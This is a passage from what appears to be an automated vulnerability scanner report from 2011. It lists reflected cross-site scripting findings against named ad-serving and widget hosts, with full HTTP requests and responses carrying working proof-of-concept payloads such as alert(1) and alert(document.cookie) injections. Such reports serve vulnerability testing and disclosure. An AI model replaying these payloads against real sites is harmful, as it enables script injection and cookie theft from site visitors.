Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l43731"-alert(1)-"187433e4b2d&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:44:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
escape("http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3aa6/f/20d/%2a/b%3B234117088%3B0-0%3B0%3B57436492%3B4252-336/280%3B40303346/40321133/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=l43731"-alert(1)-"187433e4b2d&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cu
...[SNIP]...

4.14. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff622'-alert(1)-'d54c1daec2b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=lff622'-alert(1)-'d54c1daec2b&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:44:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
href=\"http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3aa6/f/20d/%2a/b%3B234117088%3B0-0%3B0%3B57436492%3B4252-336/280%3B40303346/40321133/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=lff622'-alert(1)-'d54c1daec2b&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cu
...[SNIP]...

4.15. http://ad.doubleclick.net/adj/oiq.man.homeappliance/ [mfg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/oiq.man.homeappliance/

Issue detail

The value of the mfg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54760'-alert(1)-'16463c601ed was submitted in the mfg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/oiq.man.homeappliance/;mfg=145;tile=1;sz=720x90,728x90;ord=1296942753;u=mfg_145%7Csid_54760'-alert(1)-'16463c601ed HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 05 Feb 2011 22:27:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 368

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa5/0/0/%2a/e;227869739;0-0;0;41185174;3454-728/90;37969501/37987258/1;u=mfg_145|sid_54760'-alert(1)-'16463c601ed;~sscs=%3fhttp://owneriq.com/advertisers?src=728x90_blue">
...[SNIP]...

4.16. http://ad.doubleclick.net/adj/oiq.man.homeappliance/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/oiq.man.homeappliance/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e06e3'-alert(1)-'618b2b40360 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/oiq.man.homeappliance/;tile=1;sz=720x90,728x90;ord=1296942794;u=sid_&e06e3'-alert(1)-'618b2b40360=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 05 Feb 2011 22:26:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 363

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa5/0/0/%2a/e;227869739;0-0;0;41185174;3454-728/90;37969501/37987258/1;u=sid_&e06e3'-alert(1)-'618b2b40360=1;~sscs=%3fhttp://owneriq.com/advertisers?src=728x90_blue">
...[SNIP]...

4.17. http://ad.doubleclick.net/adj/oiq.man.homeappliance/ [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/oiq.man.homeappliance/

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19620'-alert(1)-'d06efb22ec was submitted in the tile parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/oiq.man.homeappliance/;tile=1;sz=720x90,728x90;ord=1296942794;u=sid_19620'-alert(1)-'d06efb22ec HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 05 Feb 2011 22:25:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 359

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa5/0/0/%2a/e;227869739;0-0;0;41185174;3454-728/90;37969501/37987258/1;u=sid_19620'-alert(1)-'d06efb22ec;~sscs=%3fhttp://owneriq.com/advertisers?src=728x90_blue">
...[SNIP]...

4.18. http://appcdn.wibiya.com/Handlers/newsticker.php [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://appcdn.wibiya.com
Path:   /Handlers/newsticker.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 270ed<script>alert(1)</script>529ef0f2bb5 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Handlers/newsticker.php?callback=jsonp_2715064_0270ed<script>alert(1)</script>529ef0f2bb5&url=http%3A//www.kledy.de/rss_dts.php HTTP/1.1
Host: appcdn.wibiya.com
Proxy-Connection: keep-alive
Referer: http://www.kledy.de/bookmarks.php?18fe2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eef67307aec5=1
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1286380163-1295459907704

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Type: text/html; charset=UTF-8
Date: Sat, 05 Feb 2011 23:08:34 GMT
Expires: Sun, 06 Feb 2011 00:08:34 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.4 with Suhosin-Patch
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.6-3ubuntu4.4
Content-Length: 51609

jsonp_2715064_0270ed<script>alert(1)</script>529ef0f2bb5({"name":"Kledy.de | Aktuelle News","posts":[{"title":"Lottozahlen vom Samstag (05.02.2011)","description":" In der Samstags-Ausspielung von &#34;6 aus 49&#34; des Deutschen Lotto- und Totoblocks wurde
...[SNIP]...

4.19. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 115a8<script>alert(1)</script>512fdd36cd3 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction115a8<script>alert(1)</script>512fdd36cd3&n=ar_int_p68511049&1296999647490 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296999600%2E136%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 13:40:10 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction115a8<script>alert(1)</script>512fdd36cd3("");

4.20. http://baselinemag.us.intellitxt.com/al.asp [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://baselinemag.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3edca%3balert(1)//64bba91453a was submitted in the jscallback parameter. This input was echoed as 3edca;alert(1)//64bba91453a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110206132315&adid=401622%2C401622%2C401622&cc=us&di=29166142%2C28321520%2C28321702&hk=1&ipid=12630&mh=167defd4b82c3759d8e6179eb5de4354&pid=2%2C2%2C2&pvm=b60133d74d36fa666d2419a757f62f74&pvu=F09FDD7F3F444C1FA642829D016326B5&rcc=us&so=0&syid=0%2C0%2C0&uf=0%2C0%2C0&ur=0%2C0%2C0&kp=328%2C930%3B336%2C984%3B245%2C1284%3B&prf=ll%3A1385%7Cintl%3A1992%7Cpreprochrome%3A6%7Cgetconchrome%3A27%7Cadvint%3A2035%7Cadvl%3A2035%7Ctl%3A2151&jscallback=$iTXT.js.callback13edca%3balert(1)//64bba91453a HTTP/1.1
Host: baselinemag.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:23:40 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Sun, 06 Feb 2011 13:23:40 GMT
Connection: close

try{$iTXT.js.callback13edca;alert(1)//64bba91453a();}catch(e){}

4.21. http://baselinemag.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://baselinemag.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91531'-alert(1)-'750bcc2e0e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=12630&91531'-alert(1)-'750bcc2e0e0=1 HTTP/1.1
Host: baselinemag.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gQAAAEt99ts1wA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wUAAAEt+yJhIgA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:21:30 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wUAAAEt+yJhIgA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:21:30 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 13:21:29 GMT
Content-Length: 10716

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
qoptions={tags:"1480.3017.12630"};_qacct="p-fdwEfW0hIeH9U";$iTXT.js.load("http://edge.quantserve.com/quant.js");$iTXT.js.serverUrl='http://baselinemag.us.intellitxt.com';$iTXT.js.pageQuery='ipid=12630&91531'-alert(1)-'750bcc2e0e0=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

4.22. http://baselinemag.us.intellitxt.com/v4/init [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://baselinemag.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 19f15%3balert(1)//734f2337570 was submitted in the jscallback parameter. This input was echoed as 19f15;alert(1)//734f2337570 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1296998594508&pagecl=48119&fv=10&muid=&refurl=http%3A%2F%2Fwww.baselinemag.com%2Fc%2Fa%2FIT-Management%2FMacys-Ramps-Up-Online-Operations-637464%2F&ipid=12630&jscallback=$iTXT.js.callback019f15%3balert(1)//734f2337570 HTTP/1.1
Host: baselinemag.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 13:22:54 GMT
Connection: close
Content-Length: 12169

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback019f15;alert(1)//734f2337570({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

4.23. http://baselinemag.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://baselinemag.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa9e1"-alert(1)-"d53ef40e92d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1296998594508&pagecl=48119&fv=10&muid=&refurl=http%3A%2F%2Fwww.baselinemag.com%2Fc%2Fa%2FIT-Management%2FMacys-Ramps-Up-Online-Operations-637464%2F&ipid=12630&jscallback=$iTXT.js.callback0&aa9e1"-alert(1)-"d53ef40e92d=1 HTTP/1.1
Host: baselinemag.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
